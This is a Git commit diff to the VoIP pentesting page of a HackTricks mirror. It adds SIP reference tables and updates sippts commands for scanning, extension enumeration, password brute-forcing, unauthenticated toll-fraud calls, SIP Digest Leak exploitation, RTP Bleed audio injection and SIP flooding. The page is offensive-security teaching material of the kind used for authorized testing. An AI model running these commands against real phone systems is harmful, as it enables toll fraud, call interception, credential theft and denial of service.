Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update VoIP tools

Browse source
This commit is contained in:
Jose Luis Verdeguer 2024-05-17 11:12:47 +02:00 committed by GitHub
parent ff6b54afb1
commit 96b2007f80
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 195 additions and 40 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

235
network-services-pentesting/pentesting-voip/README.md
View file

@ -22,6 +22,136 @@ To start learning about how VoIP works check:
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}
## Basic Messages
```
Request name Description RFC references
------------------------------------------------------------------------------------------------------
REGISTER Register a SIP user. RFC 3261
INVITE Initiate a dialog for establishing a call. RFC 3261
ACK Confirm that an entity has received. RFC 3261
BYE Signal termination of a dialog and end a call. RFC 3261
CANCEL Cancel any pending request. RFC 3261
UPDATE Modify the state of a session without changing the state of the dialog. RFC 3311
REFER Ask recipient to issue a request for the purpose of call transfer. RFC 3515
PRACK Provisional acknowledgement. RFC 3262
SUBSCRIBE Initiates a subscription for notification of events from a notifier. RFC 6665
NOTIFY Inform a subscriber of notifications of a new event. RFC 6665
PUBLISH Publish an event to a notification server. RFC 3903
MESSAGE Deliver a text message. Used in instant messaging applications. RFC 3428
INFO Send mid-session information that does not modify the session state. RFC 6086
OPTIONS Query the capabilities of an endpoint RFC 3261
```
## Response Codes
**1xx—Provisional Responses**
```
100 Trying
180 Ringing
181 Call is Being Forwarded
182 Queued
183 Session Progress
199 Early Dialog Terminated
```
**2xx—Successful Responses**
```
200 OK
202 Accepted
204 No Notification
```
**3xx—Redirection Responses**
```
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
305 Use Proxy
380 Alternative Service
```
**4xx—Client Failure Responses**
```
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Conditional Request Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
416 Unsupported URI Scheme
417 Unknown Resource-Priority
420 Bad Extension
421 Extension Required
422 Session Interval Too Small
423 Interval Too Brief
424 Bad Location Information
425 Bad Alert Message
428 Use Identity Header
429 Provide Referrer Identity
430 Flow Failed
433 Anonymity Disallowed
436 Bad Identity-Info
437 Unsupported Certificate
438 Invalid Identity Header
439 First Hop Lacks Outbound Support
440 Max-Breadth Exceeded
469 Bad Info Package
470 Consent Needed
480 Temporarily Unavailable
481 Call/Transaction Does Not Exist
482 Loop Detected
483 Too Many Hops
484 Address Incomplete
485 Ambiguous
486 Busy Here
487 Request Terminated
488 Not Acceptable Here
489 Bad Event
491 Request Pending
493 Undecipherable
494 Security Agreement Required
```
**5xx—Server Failure Responses**
```
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Server Time-out
505 Version Not Supported
513 Message Too Large
555 Push Notification Service Not Supported
580 Precondition Failure
```
**6xx—Global Failure Responses**
```
600 Busy Everywhere
603 Decline
604 Does Not Exist Anywhere
606 Not Acceptable
607 Unwanted
608 Rejected
```
## VoIP Enumeration
### Telephone Numbers
@ -80,6 +210,11 @@ Any other OSINT enumeration that helps to identify VoIP software being used will
### Network Enumeration
* **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not be very accurate with this kind of services.
```bash
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
```
* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.
* `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.
@ -88,10 +223,10 @@ Any other OSINT enumeration that helps to identify VoIP software being used will
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
```
* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
* **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
```bash
./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
@ -99,7 +234,6 @@ svmap 10.10.0.0/24 -p 5060-5070 [--fp]
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
```
* **metasploit**:
@ -124,10 +258,24 @@ The PBX could also be exposing other network services such as:
### Methods Enumeration
It's possible to find **which methods are available** to use in the PBX using `sipenumerate.py` from [**sippts**](https://github.com/Pepelux/sippts)
It's possible to find **which methods are available** to use in the PBX using `SIPPTS enumerate` from [**sippts**](https://github.com/Pepelux/sippts)
```bash
python3 sipenumerate.py -i 10.10.0.10 -r 5080
sippts enumerate -i 10.10.0.10
```
### Analysing server responses
It is very important to analyse the headers that a server sends back to us, depending on the type of message and headers that we send. With `SIPPTS send` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised messages, manipulating all the headers, and analyse the response.
```bash
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
```
It is also possible to obtain data if the server uses websockets. With `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised WS messages.
```bash
sippts wssend -i 10.10.0.10 -r 443 -path /ws
```
### Extension Enumeration
@ -140,10 +288,10 @@ Extensions in a PBX (Private Branch Exchange) system refer to the **unique inter
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
```
* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
* **`SIPPTS exten`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
```bash
python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
```
* **metasploit**: You can also enumerate extensions/usernames with metasploit:
@ -162,7 +310,7 @@ enumiax -v -m3 -M3 10.10.0.10
## VoIP Attacks
### Password Brute-Force
### Password Brute-Force - online
Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.
@ -179,13 +327,11 @@ svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
```
* **`sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
* **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users in different IPs and port ranges.
{% code overflow="wrap" %}
```bash
python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
```
{% endcode %}
* **Metasploit**:
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
@ -204,7 +350,7 @@ Note that if **TLS is used in the SIP communication** you won't be able to see t
The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**.
{% endhint %}
#### SIP credentials
#### SIP credentials (Password Brute-Force - offline)
[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.
@ -215,15 +361,23 @@ sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
```
* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:**
* **SipTshark** extracts data of SIP protocol from a PCAP file.
* **SipDump** Extracts SIP Digest authentications from a PCAP file.
* **SIP Digest Crack** is a tool to crack the digest authentications within the SIP protocol.
* **`SIPPTS dump`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dump can extract digest authentications from a pcap file.
```bash
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
sippts dump -f capture.pcap -o data.txt
```
* **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack is a tool to crack the digest authentications obtained with SIPPTS dump.
```bash
sippts dcrack -f data.txt -w wordlist/rockyou.txt
```
* **`SIPPTS tshark`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark extracts data of SIP protocol from a PCAP file.
```bash
sippts tshark -f capture.pcap [-filter auth]
```
#### DTMF codes
@ -311,17 +465,17 @@ Anyone will be able to use the **server to call to any other number** (and the a
Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
{% endhint %}
* **`sipinvite.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
* **`SIPPTS invite`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 10.10.0.10 -fu 200 -tu 555555555 -v
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
```
{% endcode %}
@ -374,13 +528,13 @@ exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
## SIPDigestLeak
## SIPDigestLeak vulnerability
The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.
**[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
1. An IP Phone (victim) is listening on port 5060, accepting phone calls
1. An IP Phone (victim) is listening on any port (for example: 5060), accepting phone calls
2. The attacker sends an INVITE to the IP Phone
3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
@ -388,10 +542,10 @@ The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones
6. The **victim phone provides a response to the authentication challenge** in a second BYE
7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
* **sipdigestleak.py** from [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak exploits this vulnerability.
* **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects a large number of SIP Phones. The output can be saved in SipCrack format to bruteforce it using SIPPTS dcrack or the SipCrack tool.
```bash
python3 sipdigestleak.py -i 10.10.0.10
sippts leak -i 10.10.0.10
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
@ -467,7 +621,7 @@ You could also even make Asterisk **execute a script that will leak the call** w
exten => h,1,System(/tmp/leak_conv.sh &)
```
### RTCPBleed
### RTCPBleed vulnerability
**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.
@ -479,28 +633,28 @@ Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which en
For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* **`rtpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
* **`SIPPTS rtpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleed detects the RTP Bleed vulnerability sending RTP streams.
```bash
python3 rtpbleed.py -i 10.10.0.10
sippts rtpbleed -i 10.10.0.10
```
* **`rtcpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams
* **`SIPPTS rtcpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtcpbleed detects the RTP Bleed vulnerability sending RTCP streams.
```bash
python3 rtcpbleed.py -i 10.10.0.10
sippts rtcpbleed -i 10.10.0.10
```
* **`rtpbleedflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams
* **`SIPPTS rtpbleedflood`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedflood exploit the RTP Bleed vulnerability sending RTP streams.
```bash
python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
```
* **`rtpbleedinject.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams (from an audio file)
* **`SIPPTS rtpbleedinject`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject exploit the RTP Bleed vulnerability injecting an audio file (WAV format).
```bash
python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
```
### RCE
@ -541,16 +695,16 @@ Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando
There are several ways to try to achieve DoS in VoIP servers.
* **`sipflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ sends unlimited messages to the target
* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
* **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.
* `sippts flood -i 10.10.0.10 -m invite -v`
* **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time.
* `sippts ping -i 10.10.0.10`
* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
* Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
* **`sipsend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend allow us to send a **customized SIP message** and analyze the response.
* **`wssend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend allow us to send a customized SIP message over WebSockets and analyze the response.
### OS Vulnerabilities
@ -559,6 +713,7 @@ The easiest way to install a software such as Asterisk is to download an **OS di
## References
* [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
* [https://github.com/EnableSecurity/sipvicious](https://github.com/EnableSecurity/sipvicious)
* [http://blog.pepelux.org/](http://blog.pepelux.org/)
* [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
* [https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4](https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4)